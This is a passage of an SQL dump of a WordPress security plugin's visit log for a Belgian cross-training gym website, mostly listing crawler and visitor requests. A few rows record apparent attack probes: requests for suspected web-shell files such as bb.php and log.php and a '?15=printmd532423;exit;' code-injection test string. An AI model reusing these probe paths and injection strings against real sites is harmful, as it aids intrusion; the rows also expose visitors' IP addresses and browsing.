(76257, 1498566435.599939, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76258, 1498566436.070382, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76259, 1498566436.644835, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76260, 1498566437.080790, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76261, 1498566437.496651, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76262, 1498566437.984177, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76263, 1498566438.575338, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76264, 1498567893.493163, 1834512911, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(76265, 1498572283.926350, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76266, 1498575945.084582, 1123634948, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76267, 1498575946.542616, 1123635081, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76268, 1498576123.661525, 2509959733, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(76269, 1498577497.794086, 919627301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76270, 1498577498.331629, 919627301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76271, 1498578622.906517, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76272, 1498580446.476553, 1336759242, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/log.php', 'http://crosstrainingcenter.be/wp-content/plugins/log.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76273, 1498581399.348594, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76274, 1498586061.764844, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(76275, 1498586062.411260, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76276, 1498586062.973796, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76277, 1498586063.436271, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76278, 1498586063.920501, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76279, 1498586064.452599, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76280, 1498586064.892306, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76281, 1498586065.377786, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76282, 1498586065.818417, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76283, 1498586066.264446, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76284, 1498586066.697859, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76285, 1498586067.201944, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76286, 1498586067.642930, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76287, 1498586068.250082, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76288, 1498587959.239063, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76289, 1498590344.427493, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76290, 1498590345.084329, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76291, 1498590345.527172, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76292, 1498590345.962062, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76293, 1498590346.595970, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76294, 1498590347.051864, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76295, 1498590347.604482, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76296, 1498590348.061127, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76297, 1498590348.497448, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76298, 1498590348.924655, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76299, 1498590349.337948, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76300, 1498595432.379467, 1538704198, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0ahUKEwiWoI_y7t7UAhWMaVAKHXtfDSYQFghnMA8&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76301, 1498595433.900990, 1538704198, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76302, 1498595437.740421, 1538704198, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76303, 1498595438.842754, 1538704198, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76304, 1498595457.848020, 1538704198, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76305, 1498595467.379005, 1538704198, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76306, 1498598256.426130, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76307, 1498598256.983182, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76308, 1498598257.486519, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76309, 1498598258.029932, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76310, 1498598258.510202, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76311, 1498598258.956821, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(76312, 1498598259.474084, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76313, 1498598260.049770, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76314, 1498598260.469476, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76315, 1498598260.965884, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76316, 1498598261.469041, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76317, 1498601754.956040, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76318, 1498604286.099644, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76319, 1498607555.603689, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76320, 1498610894.390571, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76321, 1498612491.759405, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76322, 1498616014.185634, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76323, 1498621118.498960, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76324, 1498621180.347771, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76325, 1498621706.312016, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76326, 1498622815.727931, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76327, 1498623944.587010, 3475901792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76328, 1498625723.955486, 2637637426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76329, 1498626243.342951, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76330, 1498629090.306686, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76331, 1498629832.131410, 3569402886, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/shop', 'crosstrainingcenter.be/shop', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76332, 1498629844.142319, 3569402886, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/shop', 'crosstrainingcenter.be/shop', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76333, 1498630446.166761, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76334, 1498632218.891403, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76335, 1498634932.431363, 2513051914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76336, 1498634988.965758, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76337, 1498635032.589607, 2513051914, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/upgrade/bb.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76338, 1498635104.817142, 2513051914, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/bb.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76339, 1498635238.705267, 2513051914, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/b.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76340, 1498638177.141768, 2513061429, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/indes.php?15=printmd532423;exit;', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76341, 1498638193.691561, 2513061429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?15=printmd532423;exit;', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76342, 1498638433.228554, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76343, 1498638433.947256, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76344, 1498643033.852932, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76345, 1498649270.917444, 3475901792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76346, 1498650673.578043, 3157024305, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76347, 1498650727.215060, 3157024305, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76348, 1498650760.445063, 3157024305, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76349, 1498650932.479516, 3157024305, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76350, 1498652977.886421, 676177702, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76351, 1498653993.745756, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76352, 1498657252.091378, 632818382, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76353, 1498657252.754873, 632818382, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76354, 1498657253.278243, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76355, 1498657253.739970, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76356, 1498657254.190413, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76357, 1498657254.668859, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76358, 1498657255.205082, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76359, 1498657255.676895, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76360, 1498657256.142412, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76361, 1498657256.596424, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76362, 1498657257.268141, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76363, 1498660873.424128, 772030661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76364, 1498660876.187214, 772030661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76365, 1498660878.724681, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76366, 1498660880.656278, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76367, 1498660882.968884, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76368, 1498660885.637392, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76369, 1498660887.595001, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76370, 1498660890.296376, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76371, 1498660894.693230, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76372, 1498660899.828857, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76373, 1498660900.327044, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76374, 1498660900.884896, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76375, 1498660901.413718, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
